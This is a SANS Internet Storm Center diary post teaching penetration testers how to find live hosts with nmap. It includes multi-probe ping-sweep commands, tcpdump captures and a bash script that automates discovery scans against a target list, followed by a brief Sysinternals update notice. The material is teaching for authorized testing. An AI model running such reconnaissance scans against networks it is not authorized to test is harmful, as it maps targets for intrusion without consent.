(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Host discovery with nmap, (Tue, Aug 12th)

Tue, 08/12/2014 - 04:27

I enjoy performing penetration tests, I also enjoy teaching how to do penetration testing correctly. Next time up is SANS Sec560 network penetration testing in Albuquerque, NM. When I am teaching one of the points I make is to make good use of your tools. You really want to know which tools is appropriate for which parts of the engagement methodology and test plan. You also want to be familiar with the features and quirks of each tool in your kit. Most people are familiar with nmap as a port scanner, and often some of the other features such as service versioning and operating system fingerprinting. What I would like to talk about today are some of the features of nmap that work well together. One of the tasks in a penetration test or a vulnerability assessment is to identify which hosts are likely alive and responsive. Security testing involves sending stimulus, monitoring, and seeing responses. In this case we typically use nmap to send the stimulus, tcpdump to perform the monitoring, and the responses will tell us which hosts are responding to the packets nmap is sending.

Nmap is most often used to perform a ping sweep with its default series of packets. This option was -sP and is now -sn.

'nmap -sn -iL targets nmap-default-ping'

With root privileges this will send ICMP ech request (ping), a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. This is efficient and in many cases is sufficient to identify those hosts that are responsive. In the case of a relatively flat internal network this is often the case.  

Tcpdump shows us that 4 packets were sent, 4 responses were also seen.

17:08:37.469613 IP 198.41.30.84 > 74.207.244.221: ICMP echo request, id 44412, seq 0, length 8
17:08:37.469641 IP 198.41.30.84.42601 > 74.207.244.221.443: Flags [S], seq 4035393928, win 1024, options [mss 1460], length 0
17:08:37.469658 IP 198.41.30.84.42601 > 74.207.244.221.80: Flags [.], ack 4035393928, win 1024, length 0
17:08:37.469664 IP 198.41.30.84 > 74.207.244.221: ICMP time stamp query id 30952 seq 0, length 20
17:08:37.541827 IP 74.207.244.221 > 198.41.30.84: ICMP echo reply, id 44412, seq 0, length 8
17:08:37.541841 IP 74.207.244.221.443 > 198.41.30.84.42601: Flags [R.], seq 0, ack 4035393929, win 0, length 0
17:08:37.541868 IP 74.207.244.221.80 > 198.41.30.84.42601: Flags [R], seq 4035393928, win 0, length 0
17:08:37.541968 IP 74.207.244.221 > 198.41.30.84: ICMP time stamp reply id 30952 seq 0: org 00:00:00.000, recv 21:00:18.026, xmit 21:00:18.026, length 20

(74.207.244.221 is scan.nmap.org)

The problem with only sending these 4 packets as the means to do hosts discovery is that it may miss many test cases, and is therefore less accurate. This is an issue in many pentests where we need to balance accuracy against efficient use of our time. Scanning an arbitrary /19 and we see the following results:

Nmap done: 8192 IP addresses (5668 hosts up) scanned in 24.31 seconds
           Raw packets sent: 26981 (968.952KB) | Rcvd: 5954 (176.168KB)

Now consider the following:
 'nmap -sn -PS -PA -PU -PY -PE -PP -PM -PO -n -vv --reason --packet-trace --traceroute -iL targets -oA nmap-full-sweep'
 
Nmap done: 8192 IP addresses (5676 hosts up) scanned in 438.24 seconds
           Raw packets sent: 80075 (2.518MB) | Rcvd: 94752 (4.014MB)

The --reason option tells us which stimulus the hosts responded to. --paket-trace outputs to the screen the packets flying back and forth, giving us a visual indicator to see if the tests are running correctly. The second scan sends 3 different ICMP packets, TCP, UDP, SCTP, and some raw IP packets. The only other tool I often run along with nmap is ike-scan to identify VPN devices that do not respond to any other packets. From the nmap man page:             
-sn: Ping Scan - disable port scan
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping

We gained an additional 8 hosts identified as being responsive, however we sent over 3 times the packets and it took much much longer. The second scan is arguably much more accurate, and certainly is a much more impressive command line! Putting together the tools we can construct a nice bash script to run tcpdump and nmap against a target list. The script checks to see if has root privilege, sets up some variables, creats a scan log, runs tcpdump, runs nmap, then stops tcpdump.  

Cheers,
Adrien de Beaupre
Intru-shun.ca Inc.

Check out BSides Ottawa, our CfP is still open! Con is 5-6 September
http://www.bsidesottawa.ca/
I will be teaching SANS Sec560, Network Penetration Testing next in Albuquerque, NM!
http://www.sans.org/event/albuquerque-2014/course/network-penetration-testing-ethical-hacking

References:
http://nmap.org/book/man-host-discovery.html
http://www.nta-monitor.com/tools-resources/security-tools/ike-scan

Begin script:

#!/bin/bash
#Usage: discover.sh targetfilename
# Modified 10 August 2014, Adrien de Beaupre
# Check to see if we have root privileges, exit if not.
if [[ $EUID -ne 0 ]]; then
        echo "$0 must be run as root"
        exit 1
fi
# Check to see if we have a filename as one argument, exit if not.
# Number of arguments we want
GOODARGS=1
if [ $# -ne $GOODARGS ]; then
        echo "Usage: `basename $0` {targetfilename}"
        exit 1
fi
# Check to see if target file exists, exit if not
if [ ! -f $1 ]; then
        echo "Target file \"`basename $1`\" does not exist"
        exit 1
fi
# Declare variables
# Target file
TARGETS=`cat $1`
# Timestamp variable
NOW=$(date +%F-%s)
# Tcpdump program to run variable
TCPDUMP=/usr/local/sbin/tcpdump
# Run the tcpdump program
$TCPDUMP -n -v -i eth0 -w tcpdump-discovery.$NOW.$1.dump 2>/dev/null &
# Variable for the process ID
PID=$!
# Start discovery scan, create or append to scanlog
echo -e 'Discovery scan start:' $HOST | tee -a scanlog
date >> scanlog
# Nmap discovery
nmap -sn -PS -PA -PU -PY -PE -PP -PM -PO -n -vv --reason --packet-trace --traceroute -iL $1 -oA $1-discovery-nmap-$NOW
# Wait two seconds before killing sniffer
sleep 2
# Kill the tcpdump program by PID
echo -e 'Tcpdump stopped:' $HOST | tee -a scanlog
date >> scanlog
kill $PID

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Sysinternals updates Sysmon v1.0; Updates: Autoruns v12.01, Coreinfo v3.3, Procexp v16.03 http://blogs.technet.com/b/sysinternals/, (Tue, Aug 12th)

Tue, 08/12/2014 - 04:22
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts